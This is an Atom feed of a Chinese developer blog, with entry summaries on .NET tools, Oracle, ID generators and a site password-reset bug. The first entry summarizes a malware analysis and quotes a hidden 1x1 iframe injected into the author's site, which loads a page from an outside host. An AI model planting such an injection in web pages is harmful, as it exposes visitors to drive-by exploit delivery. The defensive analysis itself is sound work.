<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom"><title type="text">博客园_浪淘沙</title><subtitle type="text">XSpin is blogged by xPilot &amp; Janssen</subtitle><id>http://feed.cnblogs.com/blog/u/4833/rss</id><updated>2007-05-11T09:41:00Z</updated><author><name>浪淘沙</name><uri>http://www.cnblogs.com/xspin/</uri></author><generator>CNBlogs BlogServer</generator><link rel="alternate" type="text/html" href="http://www.cnblogs.com/xspin/"/><link rel="self" type="application/atom+xml" href="http://feed.cnblogs.com/blog/u/4833/rss"/><entry><id>http://www.cnblogs.com/xspin/archive/2007/03/18/ms06-014.html</id><title type="text">一个病毒代码的分析（针对MS06-014公告列出的漏洞）</title><summary type="text">突然一天打开自己的网站被瑞星杀出个特洛伊来，xPilot的麦咖啡也查到了，仔细检查服务器上自己写的代码并没有什么可疑的地方，看着都是自己写的，再看看发送过来的网页代码，发现被嵌入了一个&amp;lt;iframe&amp;gt;：&amp;lt;iFrAmESRc=http://cool.47555.com/k.htmwidth=1height=1frameborder=0&amp;gt;&amp;lt;/IfRaMe&amp;gt;一看就估计...</summary><published>2007-03-18T12:02:00Z</published><updated>2007-03-18T12:02:00Z</updated><author><name>浪淘沙</name><uri>http://www.cnblogs.com/xspin/</uri></author><link rel="alternate" href="http://www.cnblogs.com/xspin/archive/2007/03/18/ms06-014.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/xspin/archive/2007/03/18/ms06-014.html"/></entry><entry><id>http://www.cnblogs.com/xspin/archive/2006/02/06/326136.html</id><title type="text">CodeSmith与Dreamweaver</title><summary type="text">codesmith mygeneration dreamweaver</summary><published>2006-02-06T08:39:00Z</published><updated>2006-02-06T08:39:00Z</updated><author><name>浪淘沙</name><uri>http://www.cnblogs.com/xspin/</uri></author><link rel="alternate" href="http://www.cnblogs.com/xspin/archive/2006/02/06/326136.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/xspin/archive/2006/02/06/326136.html"/></entry><entry><id>http://www.cnblogs.com/xspin/archive/2005/10/23/gentlefirstview.html</id><title type="text">Gentle.NET初探</title><summary type="text">Gentle.NET 初探</summary><published>2005-10-23T13:01:00Z</published><updated>2005-10-23T13:01:00Z</updated><author><name>浪淘沙</name><uri>http://www.cnblogs.com/xspin/</uri></author><link rel="alternate" href="http://www.cnblogs.com/xspin/archive/2005/10/23/gentlefirstview.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/xspin/archive/2005/10/23/gentlefirstview.html"/></entry><entry><id>http://www.cnblogs.com/xspin/archive/2005/10/21/259492.html</id><title type="text">XP Visual Style的疑惑</title><summary type="text">在Winform中编程要打开XP风格的方法不外乎是使用manifest文件和Application.EnableVisualStyle()方法（MSDN里面都有详细介绍），但是使用Image属性的控件都将无法显示图片了，不爽，不知道除了DIY和第三方控件还有谁能想到一些解决办法</summary><published>2005-10-21T12:10:00Z</published><updated>2005-10-21T12:10:00Z</updated><author><name>浪淘沙</name><uri>http://www.cnblogs.com/xspin/</uri></author><link rel="alternate" href="http://www.cnblogs.com/xspin/archive/2005/10/21/259492.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/xspin/archive/2005/10/21/259492.html"/></entry><entry><id>http://www.cnblogs.com/xspin/archive/2005/09/01/228150.html</id><title type="text">一个完整的ID生成器，并极大地降低了并发重复的概率</title><summary type="text">前文一个ID生成器的确简单，不能解决并发带来的重复性问题。这里完整地写一个ID生成器。其中做了一些并发问题的处理。原理：获取系统时间，并在其后加上一个随机数sample:将IdentityGenerator实例化后可直接获取Embacle.Identity.IdentityGenerator ig = new Embacle.Identity.IdentityGenerator();long id...</summary><published>2005-09-01T11:23:00Z</published><updated>2005-09-01T11:23:00Z</updated><author><name>浪淘沙</name><uri>http://www.cnblogs.com/xspin/</uri></author><link rel="alternate" href="http://www.cnblogs.com/xspin/archive/2005/09/01/228150.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/xspin/archive/2005/09/01/228150.html"/></entry><entry><id>http://www.cnblogs.com/xspin/archive/2005/08/30/226112.html</id><title type="text">不再使用自动编号了。自己写了一个Id生成器，超级简单</title><summary type="text">帮一个朋友导数据时就发生自动编号的主键发生重复，花了我大半天的时间。累死了。给他们写了一个小工具，生成时间戳的代码：publicclassIdentityGenerator{privatestaticRandomrandom;publicstaticlongGetIdentity(){longid=(DateTime.Now.Ticks-(newDateTime(2000,1,1,0,0,0)))...</summary><published>2005-08-30T06:44:00Z</published><updated>2005-08-30T06:44:00Z</updated><author><name>浪淘沙</name><uri>http://www.cnblogs.com/xspin/</uri></author><link rel="alternate" href="http://www.cnblogs.com/xspin/archive/2005/08/30/226112.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/xspin/archive/2005/08/30/226112.html"/></entry><entry><id>http://www.cnblogs.com/xspin/archive/2005/06/05/168244.html</id><title type="text">博客园的一个逻辑Bug，dudu要注意</title><summary type="text">尝试了一遍又一遍，终于找到了博客园账号的注册信箱和密码，窃喜之余发现一个逻辑上的Bug：1.以测试为名，在博客园中进入“忘记密码”，输入了正确的账号和油箱，发送新密码成功;2.如果一时半会儿想不起来油箱的密码，就没有进入油箱查看密码；3.这时候原来的密码已经被永久性重置为发送到油箱中的密码了，如果我永远都进入不了这个油箱，那么我就永远无法使用这个账户，Faint，小小的测试玩笑害得我为此半年多不能...</summary><published>2005-06-05T04:40:00Z</published><updated>2005-06-05T04:40:00Z</updated><author><name>浪淘沙</name><uri>http://www.cnblogs.com/xspin/</uri></author><link rel="alternate" href="http://www.cnblogs.com/xspin/archive/2005/06/05/168244.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/xspin/archive/2005/06/05/168244.html"/></entry><entry><id>http://www.cnblogs.com/xspin/archive/2004/09/01/38423.html</id><title type="text">Oracle初学点滴-(1)</title><summary type="text">由于项目要求，公司需要把一些项目的数据库转移成Oracle，而原来几乎都是使用SqlServer的。突然间发现，2~3年的SqlServer开发和使用经验，其实并没有给我学习Oracle带来多少优势，相反在初学Oracle的时候，还经常被缠绕在脑中的SqlServer的很多模式所困扰。Oracle是一个系统而庞大的平台，其实已经不仅仅只是一个数据库那么简单了。所以对我来说，无论是其管理还是开发，几...</summary><published>2004-09-01T05:43:00Z</published><updated>2004-09-01T05:43:00Z</updated><author><name>浪淘沙</name><uri>http://www.cnblogs.com/xspin/</uri></author><link rel="alternate" href="http://www.cnblogs.com/xspin/archive/2004/09/01/38423.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/xspin/archive/2004/09/01/38423.html"/></entry><entry><id>http://www.cnblogs.com/xspin/archive/2004/09/01/38405.html</id><title type="text">有关Url Rewriting in asp.net的翻译新版本</title><summary type="text">终于看到MSDN中文站上出现了Scott Mitchell 的Url Rewriting in ASP.NET那篇文章的翻译，太好了，可以和自己原先翻译的进行一下对比，这样可以增加一下英文的功底了吧。英文原文：http://msdn.microsoft.com/library/en-us/dnaspp/html/urlrewriting.aspMSDN的翻译：http://www.microsof...</summary><published>2004-09-01T04:56:00Z</published><updated>2004-09-01T04:56:00Z</updated><author><name>浪淘沙</name><uri>http://www.cnblogs.com/xspin/</uri></author><link rel="alternate" href="http://www.cnblogs.com/xspin/archive/2004/09/01/38405.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/xspin/archive/2004/09/01/38405.html"/></entry><entry><id>http://www.cnblogs.com/xspin/archive/2004/08/20/35134.html</id><title type="text">QQ中自己加自己的办法</title><summary type="text">QQ中自己加自己的办法</summary><published>2004-08-20T05:55:00Z</published><updated>2004-08-20T05:55:00Z</updated><author><name>浪淘沙</name><uri>http://www.cnblogs.com/xspin/</uri></author><link rel="alternate" href="http://www.cnblogs.com/xspin/archive/2004/08/20/35134.html"/><link rel="alternate" type="text/html" href="http://www.cnblogs.com/xspin/archive/2004/08/20/35134.html"/></entry></feed>
